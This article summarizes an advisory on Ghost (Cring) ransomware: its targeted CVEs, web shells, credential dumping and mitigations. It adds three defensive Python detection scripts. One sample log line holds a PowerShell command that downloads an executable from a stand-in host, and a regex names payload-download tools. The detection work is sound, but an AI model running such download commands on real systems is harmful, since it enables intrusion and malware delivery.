Introduction
As the world rapidly advances, cybercrime is evolving at an alarming rate. Every day, organizations across the globe fall victim to these digital attacks. Among the most devastating cyber threats are ransomware attacks, where attackers lock or encrypt a victim’s data, demanding a ransom in exchange for restoring access.
In recent years, the frequency and sophistication of these attacks have surged, with one of the most notorious groups being the Ghost actors. This article will explore the tactics, techniques, and procedures (TTPs) used by Ghost actors and the vulnerabilities they exploit to carry out ransomware attacks.
What Are Ghost Actors?
Ghost actors, believed to be based in China, are notorious cybercriminals who indiscriminately target networks to deploy ransomware. They are primarily motivated by financial gain, and their attacks have led to the compromise of numerous critical organizations worldwide. These actors are known to use multiple aliases such as Ghost, Cring, Crypt3r, and others, making it difficult for cybersecurity experts to consistently attribute their attacks to a single group. The Ghost actors employ various tactics, such as rotating ransomware payloads, modifying file extensions for encrypted files, and varying ransom demands, which helps them evade detection and attribution.
Common Vulnerabilities and Exposures (CVEs) Targeted by Ghost Actors
Ghost actors typically exploit well-known vulnerabilities in widely used software to gain access to public-facing servers. Some of the most commonly targeted vulnerabilities include:
- Fortinet FortiOS (CVE-2018-13379)
- Microsoft Exchange’s ProxyShell attack chain (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207)
- Adobe ColdFusion vulnerabilities (CVE-2010-2861, CVE-2009-3960)
These vulnerabilities provide attackers with opportunities to bypass defenses and infiltrate networks, often causing severe consequences when patches and security updates are not promptly applied. Cybercriminals exploit these weaknesses to gain unauthorized access to systems and deploy their ransomware payloads.
Attack Execution and Ransomware Deployment
Once inside a compromised network, Ghost actors commonly upload web shells to vulnerable servers. A web shell allows them to maintain remote control over the infected system. To further their goals, the attackers use PowerShell and Command Prompt to execute commands and download additional malware, such as Cobalt Strike. This malware facilitates lateral movement within the network, ultimately enabling the attackers to deploy ransomware to encrypt critical files and demand a ransom payment in return for restoring access.
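The chain described above (web shell on a public-facing server, commands run through cmd.exe or PowerShell, additional tooling pulled down) leaves a recognizable trace in process-creation telemetry: a web-server worker process spawning a shell. The following detection is an added example written for this article, not tooling from the advisory or its authors; the log lines are constructed, and the key="value" layout and field names (Sysmon Event ID 1 style) are an assumption about whatever collector is in use.

```python
"""Flag shell or PowerShell processes launched by a web-server worker.

Added example (not from the advisory or this article): the pattern above is
a web shell on a public-facing server executing commands and downloading
tooling. The log lines are constructed; the key="value" layout and field
names (Sysmon Event ID 1 style) are an assumption about the collector.
"""
import re
from dataclasses import dataclass

# Web-server worker processes that should never spawn an interactive shell.
WEB_WORKERS = {"w3wp.exe", "httpd.exe", "coldfusion.exe", "tomcat9.exe"}
# Children whose appearance under a web worker indicates command execution.
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Command-line fragments typical of fetching a second-stage payload.
DOWNLOAD_HINTS = re.compile(
    r"Invoke-WebRequest|DownloadString|DownloadFile|certutil(\.exe)?\s+-urlcache|bitsadmin",
    re.IGNORECASE,
)


@dataclass
class Finding:
    host: str
    parent: str
    child: str
    reason: str


def parse_line(line: str) -> dict:
    """Turn a constructed key="value" log line into a dict."""
    return dict(re.findall(r'(\w+)="([^"]*)"', line))


def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(lines) -> list:
    """Return a Finding for every process-creation event matching the rule."""
    findings = []
    for line in lines:
        ev = parse_line(line)
        if ev.get("EventID") != "1":          # only process-creation events
            continue
        parent = basename(ev.get("ParentImage", ""))
        child = basename(ev.get("Image", ""))
        if parent in WEB_WORKERS and child in SHELL_CHILDREN:
            reason = "web worker spawned shell"
            if DOWNLOAD_HINTS.search(ev.get("CommandLine", "")):
                reason += "; command line fetches remote content"
            findings.append(Finding(ev.get("Host", "?"), parent, child, reason))
    return findings


# Constructed sample events: two web-shell hits on EXCH01, one benign shell, one network event.
SAMPLE_LOGS = [
    'EventID="1" Host="EXCH01" ParentImage="C:\\Windows\\System32\\inetsrv\\w3wp.exe" '
    'Image="C:\\Windows\\System32\\cmd.exe" CommandLine="cmd.exe /c whoami"',
    'EventID="1" Host="EXCH01" ParentImage="C:\\Windows\\System32\\inetsrv\\w3wp.exe" '
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="powershell -nop -c Invoke-WebRequest http://example.invalid/stage -OutFile C:\\Windows\\Temp\\s.exe"',
    'EventID="1" Host="WS07" ParentImage="C:\\Windows\\explorer.exe" '
    'Image="C:\\Windows\\System32\\cmd.exe" CommandLine="cmd.exe"',
    'EventID="3" Host="EXCH01" Image="C:\\Windows\\System32\\inetsrv\\w3wp.exe" DestinationIp="203.0.113.10"',
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOGS):
        print(f"{f.host}: {f.parent} -> {f.child} ({f.reason})")
```

The parent/child pairing is the signal worth alerting on by itself; the download hint only raises the severity. Exchange, ColdFusion and other application servers each run under their own worker process name, so WEB_WORKERS should be filled in from the real inventory rather than taken from this sample.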
Persistence and Privilege Escalation
Although persistence is not a significant focus for Ghost actors, who often act quickly to deploy ransomware, they do occasionally create new local accounts or change passwords to ensure continued access to compromised networks. In terms of privilege escalation, Ghost actors frequently use tools such as Cobalt Strike, SharpZeroLogon, and Mimikatz to steal system process tokens and elevate their privileges. This helps them gain deeper control over infected systems, making it harder for defenders to regain control.
Credential Access and Defense Evasion
Ghost actors often employ credential dumping techniques, such as using Mimikatz or Cobalt Strike’s “hashdump” function, to gather passwords or password hashes. These stolen credentials allow them to pivot and escalate their privileges to gain further access within the network. To evade detection, Ghost actors use a variety of defense evasion tactics, including the deployment of different ransomware variants and modifying ransom notes. By doing so, they attempt to obscure their true identity and activities, making it difficult for security teams to trace the attack back to the same group.
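Both the persistence behaviour described under the previous heading (new local accounts created shortly after intrusion) and the credential dumping described here can be caught from standard Windows logging. The block below is an added example written for this article, not tooling from the advisory; it runs two rules over a constructed batch of events. The field names loosely follow Security Event 4720 (user account created) and Sysmon Event 10 (process access) but are an assumption about the collector, and the change window and LSASS allow-list are placeholders to be tuned per environment.

```python
"""Two detections for the persistence and credential-access steps above.

Added example, not from the advisory or this article. It runs over a
constructed batch of Windows events; the field names loosely follow
Security Event 4720 (user account created) and Sysmon Event 10 (process
access) but are an assumption about the collector. Rule 1 flags local
account creation outside an assumed change window or by a machine account.
Rule 2 flags a process outside an assumed allow-list opening lsass.exe with
PROCESS_VM_READ, the access needed to read credential material from memory.
"""
from datetime import datetime

CHANGE_WINDOW = range(8, 18)  # assumed: account changes expected 08:00-17:59 UTC
PROCESS_VM_READ = 0x0010      # Windows access-right bit for reading process memory
LSASS_ALLOWLIST = {           # assumed allow-list; tune per environment
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\msmpeng.exe",
}


def check_account_creation(ev):
    """Rule 1: return reasons an account-creation event looks suspicious."""
    reasons = []
    hour = datetime.strptime(ev["TimeCreated"], "%Y-%m-%dT%H:%M:%SZ").hour
    if hour not in CHANGE_WINDOW:
        reasons.append("created outside change window")
    if ev["SubjectUserName"].endswith("$"):
        reasons.append("created by a machine account")
    return reasons


def check_lsass_access(ev):
    """Rule 2: return reasons a process-access event looks like credential dumping."""
    if not ev["TargetImage"].lower().endswith("\\lsass.exe"):
        return []
    source = ev["SourceImage"].lower()
    granted = int(ev["GrantedAccess"], 16)
    if source in LSASS_ALLOWLIST or not granted & PROCESS_VM_READ:
        return []
    return [f"{source} opened lsass.exe with access {ev['GrantedAccess']}"]


def analyze(events):
    """Return (host, rule, reasons) for every event that trips a rule."""
    findings = []
    for ev in events:
        if ev["EventID"] == 4720:
            reasons = check_account_creation(ev)
            rule = "new-local-account"
        elif ev["EventID"] == 10:
            reasons = check_lsass_access(ev)
            rule = "lsass-access"
        else:
            continue
        if reasons:
            findings.append((ev["Host"], rule, reasons))
    return findings


# Constructed events: one bad account creation, one routine one,
# one suspicious LSASS open, one allow-listed open, one unrelated open.
SAMPLE_EVENTS = [
    {"EventID": 4720, "Host": "FILESRV01", "TimeCreated": "2024-05-03T02:14:00Z",
     "SubjectUserName": "EXCH01$", "TargetUserName": "support"},
    {"EventID": 4720, "Host": "DC01", "TimeCreated": "2024-05-03T10:30:00Z",
     "SubjectUserName": "it.admin", "TargetUserName": "j.doe"},
    {"EventID": 10, "Host": "EXCH01", "TimeCreated": "2024-05-03T02:20:00Z",
     "SourceImage": r"C:\Users\Public\tools\svc.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "Host": "WS07", "TimeCreated": "2024-05-03T09:00:00Z",
     "SourceImage": r"C:\Windows\System32\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "Host": "WS07", "TimeCreated": "2024-05-03T09:05:00Z",
     "SourceImage": r"C:\Program Files\App\app.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1fffff"},
]

if __name__ == "__main__":
    for host, rule, reasons in analyze(SAMPLE_EVENTS):
        print(host, rule, "; ".join(reasons))
```

Rule 1 is deliberately loose: account creation is a legitimate administrative action, so the value lies in correlating the event with the creator, the time and the host rather than in the event alone. Rule 2 matches on the access mask, not on a tool name, which is why it does not depend on recognizing Mimikatz or a renamed copy of it.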
Mitigation and Recommendations
To protect against Ghost ransomware attacks, organizations must prioritize addressing vulnerabilities and employing best practices in cybersecurity. The following steps can help mitigate the risk of a successful ransomware attack:
- Patch Known Vulnerabilities: Promptly apply security patches for commonly exploited vulnerabilities, especially the CVEs targeted by Ghost actors.
- Network Monitoring: Implement continuous network monitoring to detect unusual activity and identify threats at an early stage.
- Multi-Factor Authentication (MFA): Enforce MFA across critical systems and applications to make it more difficult for attackers to gain unauthorized access.
- Data Backups: Regularly back up all data, or at a minimum all critical data, to offline or cloud-based storage. In the event of a ransomware attack, having backup copies can significantly reduce the impact.
- Training and Awareness: Train employees to recognize phishing emails, avoid suspicious links, and follow best security practices.
- Antivirus: Applying patches is not enough on its own; antivirus software should also be configured properly.
Following guidance from trusted cybersecurity agencies like the FBI, CISA, and MS-ISAC can help organizations reduce the likelihood and impact of ransomware attacks. For a more detailed guide, organizations are encouraged to consult full advisories and apply the recommended mitigation strategies.
Conclusion
Ghost actors continue to pose a significant threat to organizations worldwide. Their ability to exploit common vulnerabilities, bypass defenses, and deploy ransomware rapidly highlights the need for strong cybersecurity practices. By maintaining vigilance, applying security patches promptly, and following expert recommendations, organizations can significantly improve their defenses against these persistent and evolving threats.
Additional Resources
For more information on Ghost ransomware attacks, including Indicators of Compromise (IOCs), organizations can download the following resources:
- STIX XML (79KB)
- STIX XML (Additional IOCs) (74KB)
- STIX JSON (68KB)
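The STIX files listed above are only useful once their indicators are loaded into something that can compare them against local telemetry. The block below is an added example written for this article, not tooling from the advisory: it parses the indicator patterns out of a STIX 2.1 JSON bundle and matches them against log records. The bundle and the records are constructed, and the IP addresses, domain and hash in them are placeholders rather than real Ghost IOCs; only the simple single-comparison patterns that IOC feeds usually publish are handled.

```python
"""Load indicators from a STIX 2.1 JSON bundle and match them against logs.

Added example, not the advisory's own tooling. The bundle below is
constructed for illustration: the IP addresses, domain and hash are
placeholders, not real Ghost IOCs. Only the simple single-comparison
patterns that IOC feeds usually publish ([type:field = 'value'], possibly
joined with OR) are parsed; anything richer is skipped.
"""
import json
import re

FAKE_SHA256 = "0" * 63 + "1"  # constructed placeholder hash

BUNDLE_JSON = json.dumps({
    "type": "bundle", "id": "bundle--00000000-0000-4000-8000-000000000001",
    "objects": [
        {"type": "indicator", "spec_version": "2.1", "pattern_type": "stix",
         "id": "indicator--00000000-0000-4000-8000-000000000002",
         "name": "constructed C2 address", "valid_from": "2024-01-01T00:00:00Z",
         "pattern": "[ipv4-addr:value = '203.0.113.10']"},
        {"type": "indicator", "spec_version": "2.1", "pattern_type": "stix",
         "id": "indicator--00000000-0000-4000-8000-000000000003",
         "name": "constructed payload hash", "valid_from": "2024-01-01T00:00:00Z",
         "pattern": f"[file:hashes.'SHA-256' = '{FAKE_SHA256}']"},
        {"type": "indicator", "spec_version": "2.1", "pattern_type": "stix",
         "id": "indicator--00000000-0000-4000-8000-000000000004",
         "name": "constructed C2 domain", "valid_from": "2024-01-01T00:00:00Z",
         "pattern": "[domain-name:value = 'c2.example.invalid']"},
        {"type": "indicator", "spec_version": "2.1", "pattern_type": "stix",
         "id": "indicator--00000000-0000-4000-8000-000000000005",
         "name": "constructed staging hosts", "valid_from": "2024-01-01T00:00:00Z",
         "pattern": "[ipv4-addr:value = '198.51.100.7'] OR [ipv4-addr:value = '198.51.100.8']"},
        {"type": "malware", "spec_version": "2.1", "is_family": True,
         "id": "malware--00000000-0000-4000-8000-000000000006",
         "name": "constructed ransomware family"},
    ],
})

# One comparison: [object-type:property = 'value'] (property may be quoted, e.g. hashes.'SHA-256').
COMPARISON_RE = re.compile(r"\[([\w-]+):([\w.'-]+)\s*=\s*'([^']*)'\]")

# Which log fields map onto which STIX object/property.
FIELD_MAP = {
    "src_ip": ("ipv4-addr", "value"),
    "dst_ip": ("ipv4-addr", "value"),
    "query": ("domain-name", "value"),
    "sha256": ("file", "hashes.SHA-256"),
}


def load_indicators(bundle_json):
    """Return {(object_type, property): set(values)} from indicator patterns."""
    iocs = {}
    for obj in json.loads(bundle_json).get("objects", []):
        if obj.get("type") != "indicator" or obj.get("pattern_type", "stix") != "stix":
            continue
        for otype, prop, value in COMPARISON_RE.findall(obj["pattern"]):
            iocs.setdefault((otype, prop.replace("'", "")), set()).add(value.lower())
    return iocs


def match_logs(iocs, records):
    """Return (timestamp, field, value) for every record field that hits an IOC."""
    hits = []
    for rec in records:
        for field, key in FIELD_MAP.items():
            value = str(rec.get(field, "")).lower()
            if value and value in iocs.get(key, set()):
                hits.append((rec["ts"], field, value))
    return hits


# Constructed log records: four of the five touch an indicator.
SAMPLE_RECORDS = [
    {"ts": "2024-05-03T02:21:00Z", "src_ip": "10.0.0.5", "dst_ip": "203.0.113.10"},
    {"ts": "2024-05-03T02:21:05Z", "src_ip": "10.0.0.5", "query": "C2.EXAMPLE.INVALID"},
    {"ts": "2024-05-03T02:22:00Z", "sha256": FAKE_SHA256},
    {"ts": "2024-05-03T02:23:00Z", "src_ip": "10.0.0.9", "dst_ip": "192.0.2.1"},
    {"ts": "2024-05-03T02:24:00Z", "src_ip": "10.0.0.5", "dst_ip": "198.51.100.8"},
]

if __name__ == "__main__":
    for ts, field, value in match_logs(load_indicators(BUNDLE_JSON), SAMPLE_RECORDS):
        print(ts, field, value)
```

Values are lower-cased on both sides because domain names and hashes arrive in mixed case from different sources. Indicators whose pattern uses operators other than equality, or non-STIX pattern types such as Sigma or YARA, are silently skipped here; a production loader should count them so that coverage gaps are visible.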
A PDF file is attached for further details and additional insights. Most of the content in this article is sourced from the provided PDF, created to raise awareness among organizations and individuals about the growing threat of ransomware attacks.
By utilizing these resources and adhering to cybersecurity best practices, organizations can better safeguard themselves against the growing threat of ransomware.